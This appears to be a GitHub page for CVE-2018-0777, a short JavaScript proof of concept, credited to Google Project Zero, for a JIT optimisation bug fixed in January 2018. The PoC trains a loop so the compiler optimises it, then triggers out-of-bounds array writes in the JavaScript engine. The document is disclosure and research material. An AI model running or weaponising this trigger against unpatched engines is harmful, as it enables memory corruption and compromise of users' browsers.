Skip to content

Latest commit

 

History

History
35 lines (26 loc) · 740 Bytes

CVE-2018-0777.md

File metadata and controls

35 lines (26 loc) · 740 Bytes
Raw

CVE-2018-0777

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

function opt(arr, start, end) {
    for (let i = start; i < end; i++) {
        if (i === 10) {
            i += 0;  // <<-- (a)
        }
        arr[i] = 2.3023e-320;
    }
}

function main() {
    let arr = new Array(100);
    arr.fill(1.1);

    for (let i = 0; i < 1000; i++)
        opt(arr, 0, 3);

    opt(arr, 0, 100000);
}

main();

Reference